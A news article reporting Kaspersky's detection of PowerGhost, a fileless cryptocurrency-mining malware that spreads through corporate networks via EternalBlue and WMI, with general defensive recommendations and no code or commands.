Cryptocurrency fever has brought an increase in cybercrime. In the last months, several cases of exploited vulnerabilities have been reported, with millions of dollars in losses that has put more than one company in serious troubles, adding to the issue the harsh critics made by blockchain users.
One of the most common ways used by criminals is the spread of malicious programs, or ‘malwares’ that allows to mine cryptocurrencies once installed, by using the resources of the victim’s hardware.
Usually, it spread disguised in other type of software, such as apps, web browser extensions, VPNs, etc. which puts in danger both their security and machines.
Cybersecurity firm Kaspersky has just detected a new malicious code capable of executing as a script in Windows-enabled computers, installing itself in these machines and running stealthy and persistently, this is, it can restart itself even after rebooting the system.
Per the research conducted by the anti-virus developer, this malware – dubbed PowerGhost – takes advantage of the exploit known as EternalBlue, to establish itself in a system and spreading to other workstations and servers interconnected; this being a new way of attacking large corporate environments.
At the time, Brazil, Colombia, India, and Turkey were reported as the most affected countries by this malicious code, and to a lesser scale, the United States, Western Europe and Russia.
According to the research team’s analysis, the aforementioned exploit facilitates any script to be executed remotely.
“During infection, a one-line PowerShell script is run that downloads the miner’s body and immediately launches it without writing it to the hard drive,” the research reads.
An exploit – in the IT scope – is a software tool, a commands or action sequence used to take advantage of a flaw in the security of a computer system, in order to achieve an abnormal behavior that suites the need of an ill-intended person.
Considering that it has become popular infecting computers to steal their processing power for mining cryptocurrencies to the detriment of the victim, the combination of an exploit with a cryptocurrency mining malware such as PowerGhost can make a stealthy and dangerous threat out of these type of programs.
Kaspersky Lab explains that a hacker can easily find the passwords or credentials of users via the malware and download the mining program through Windows Management Instrumentation (WMI).
Once the first computer is infected, the code propagates and updates automatically and at the same time, it runs and maintains the mining process.
Recommendations of security experts are, in addition to always keep corporate software updated, to stick with dedicated security-specific solutions to face threats like PowerGhost.